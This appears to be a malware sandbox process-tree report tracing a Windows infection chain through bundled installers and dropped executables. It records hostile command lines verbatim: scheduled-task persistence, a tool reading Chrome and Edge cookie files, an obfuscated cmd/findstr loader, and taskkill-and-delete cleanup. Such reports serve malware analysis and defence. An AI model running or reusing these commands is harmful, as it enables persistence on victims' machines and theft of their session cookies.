- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\1874953.exe"C:\Users\Admin\AppData\Roaming\1874953.exe"7⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5412 -s 20808⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\1125106.exe"C:\Users\Admin\AppData\Roaming\1125106.exe"7⤵
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"8⤵
-
-
-
C:\Users\Admin\AppData\Roaming\5085482.exe"C:\Users\Admin\AppData\Roaming\5085482.exe"7⤵
-
-
C:\Users\Admin\AppData\Roaming\3663783.exe"C:\Users\Admin\AppData\Roaming\3663783.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6716 -s 23048⤵
- Program crash
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628921533 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"7⤵
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 680 -s 19847⤵
- Program crash
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-F83R3.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-F83R3.tmp\MediaBurner2.tmp" /SL5="$20366,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"7⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-GDKJJ.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-GDKJJ.tmp\3377047_logo_media.exe" /S /UID=burnerch28⤵
-
C:\Program Files\Common Files\WFHDHAGAJG\ultramediaburner.exe"C:\Program Files\Common Files\WFHDHAGAJG\ultramediaburner.exe" /VERYSILENT9⤵
-
C:\Users\Admin\AppData\Local\Temp\is-H6K85.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-H6K85.tmp\ultramediaburner.tmp" /SL5="$4027C,281924,62464,C:\Program Files\Common Files\WFHDHAGAJG\ultramediaburner.exe" /VERYSILENT10⤵
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\67-1a0ef-f98-276b1-1038f05c57965\Wokeqaecopae.exe"C:\Users\Admin\AppData\Local\Temp\67-1a0ef-f98-276b1-1038f05c57965\Wokeqaecopae.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdee0446f8,0x7ffdee044708,0x7ffdee04471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffdee0446f8,0x7ffdee044708,0x7ffdee04471811⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\13-2df7a-aa8-e70bd-1d1c7efac71ca\Sawiruzhetu.exe"C:\Users\Admin\AppData\Local\Temp\13-2df7a-aa8-e70bd-1d1c7efac71ca\Sawiruzhetu.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0k4dzw4a.nqw\LivelyScreenRecorder.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\0k4dzw4a.nqw\LivelyScreenRecorder.exeC:\Users\Admin\AppData\Local\Temp\0k4dzw4a.nqw\LivelyScreenRecorder.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpD032_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD032_tmp.exe"12⤵
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"13⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Presto.avi13⤵
-
C:\Windows\SysWOW64\cmd.execmd14⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^NOMPYcpppIdmxMIjpZJiqIaRacbYsDyCvWwIcZWZvJmoLxdJeLbxMJXtvVbDYlSFDOebLqQprKLsppyXtNVFyKPNZWjmCzqkRTEXaSYeUgseYGVjPmnlfjATYfnONsHKJmAdFoFjPTLRzNPzwZ$" Oggi.avi15⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comHai.exe.com l15⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l16⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l17⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l18⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l19⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l20⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l21⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l22⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l23⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l24⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l25⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l26⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l27⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l28⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l29⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l30⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l31⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l32⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l33⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l34⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l35⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l36⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l37⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l38⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l39⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l40⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l41⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l42⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l43⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l44⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l45⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l46⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l47⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l48⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l49⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l50⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l51⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l52⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l53⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l54⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l55⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l56⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l57⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l58⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l59⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l60⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Hai.exe.com l61⤵
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 3015⤵
- Suspicious use of SetThreadContext
- Runs ping.exe
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uuz43tgv.2pz\GcleanerEU.exe /eufive & exit10⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dy0tpbj0.pv4\JoSetp.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\dy0tpbj0.pv4\JoSetp.exeC:\Users\Admin\AppData\Local\Temp\dy0tpbj0.pv4\JoSetp.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"C:\Users\Admin\AppData\Local\Temp\Chrome4.exe"12⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit13⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'14⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit14⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'15⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"14⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\JoSetp.exe"12⤵
-
C:\Users\Admin\AppData\Roaming\7751116.exe"C:\Users\Admin\AppData\Roaming\7751116.exe"13⤵
-
-
C:\Users\Admin\AppData\Roaming\6608348.exe"C:\Users\Admin\AppData\Roaming\6608348.exe"13⤵
-
-
C:\Users\Admin\AppData\Roaming\4043255.exe"C:\Users\Admin\AppData\Roaming\4043255.exe"13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7000 -s 231214⤵
- Program crash
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exeC:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exe /qn CAMPAIGN="654"11⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\w3ptuzki.m4a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628921533 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2aot2mwn.v2s\ufgaa.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\2aot2mwn.v2s\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\2aot2mwn.v2s\ufgaa.exe11⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exeC:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe"C:\Users\Admin\AppData\Local\Temp\lt4y0e4d.liv\anyname.exe" -q12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6708 -s 61213⤵
- Program crash
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vl5xt13d.ewq\cleanpro13.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\vl5xt13d.ewq\cleanpro13.exeC:\Users\Admin\AppData\Local\Temp\vl5xt13d.ewq\cleanpro13.exe11⤵
-
C:\Users\Admin\Documents\3A6YukbTKpgRKbVd7jTkZUDI.exe"C:\Users\Admin\Documents\3A6YukbTKpgRKbVd7jTkZUDI.exe"12⤵
-
-
C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe"C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe"12⤵
-
C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exeC:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe13⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exeC:\Users\Admin\Documents\U0Y0YKNIlEqdzGuVOYcdoS5u.exe13⤵
-
-
-
C:\Users\Admin\Documents\IyZtvv29Lz7muSLVG76Sp6ik.exe"C:\Users\Admin\Documents\IyZtvv29Lz7muSLVG76Sp6ik.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 24013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe"C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe"12⤵
-
C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe"C:\Users\Admin\Documents\9nvXOf5x38_2JT_Q1i9GWbsC.exe" -q13⤵
-
-
-
C:\Users\Admin\Documents\enFJQ3TgOX8dJh_pbrnSA6tN.exe"C:\Users\Admin\Documents\enFJQ3TgOX8dJh_pbrnSA6tN.exe"12⤵
-
-
C:\Users\Admin\Documents\ctomSZA3hwOPFqW5jF0gMEN1.exe"C:\Users\Admin\Documents\ctomSZA3hwOPFqW5jF0gMEN1.exe"12⤵
-
-
C:\Users\Admin\Documents\9za4DXufqNccSThTAZ8Swfje.exe"C:\Users\Admin\Documents\9za4DXufqNccSThTAZ8Swfje.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3804 -s 24013⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\odrrJ3Mi3jRotYBryF5Fuslp.exe"C:\Users\Admin\Documents\odrrJ3Mi3jRotYBryF5Fuslp.exe"12⤵
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
-
-
-
C:\Users\Admin\Documents\dfAadjkHK4cB3nHlwZrjQk5I.exe"C:\Users\Admin\Documents\dfAadjkHK4cB3nHlwZrjQk5I.exe"12⤵
-
C:\Users\Admin\AppData\Roaming\2783254.exe"C:\Users\Admin\AppData\Roaming\2783254.exe"13⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6940 -s 210414⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Roaming\1981202.exe"C:\Users\Admin\AppData\Roaming\1981202.exe"13⤵
-
-
C:\Users\Admin\AppData\Roaming\3516890.exe"C:\Users\Admin\AppData\Roaming\3516890.exe"13⤵
-
C:\Users\Admin\AppData\Roaming\3516890.exe"C:\Users\Admin\AppData\Roaming\3516890.exe"14⤵
-
-
-
-
C:\Users\Admin\Documents\JKhhzunji8PQdSLHcCVEadQw.exe"C:\Users\Admin\Documents\JKhhzunji8PQdSLHcCVEadQw.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1888 -s 29613⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"12⤵
-
C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"13⤵
-
-
C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"13⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3872 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 387215⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 3872 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ygtk80RcDORaaz8SS1KFvIBI.exe"14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 387215⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Documents\SbEGxMWtazMk_llTT7tJAcmP.exe"C:\Users\Admin\Documents\SbEGxMWtazMk_llTT7tJAcmP.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 31613⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exe"C:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exe"12⤵
-
C:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exeC:\Users\Admin\Documents\dHm8oDIfAR0s1xfSCiGKgWsV.exe13⤵
-
-
-
C:\Users\Admin\Documents\Tw3ZWEp14X67CqKzuCUbKNGj.exe"C:\Users\Admin\Documents\Tw3ZWEp14X67CqKzuCUbKNGj.exe"12⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7324 -s 23613⤵
- Program crash
-
-
-
C:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exe"C:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exe"12⤵
-
C:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exeC:\Users\Admin\Documents\ThlM6x9C9Hpsk2_XSWT_TgRR.exe13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1548 -s 2814⤵
- Program crash
-
-
-
-
C:\Users\Admin\Documents\lMRak8Sy9JeJj8Dx84hTlUbN.exe"C:\Users\Admin\Documents\lMRak8Sy9JeJj8Dx84hTlUbN.exe"12⤵
-
-
C:\Users\Admin\Documents\rLVAaTRhHGqkYq5jnbnn4IDj.exe"C:\Users\Admin\Documents\rLVAaTRhHGqkYq5jnbnn4IDj.exe"12⤵
-
-
C:\Users\Admin\Documents\01fkSM24Sl5dH6cOcv1I39nF.exe"C:\Users\Admin\Documents\01fkSM24Sl5dH6cOcv1I39nF.exe"12⤵
-
-
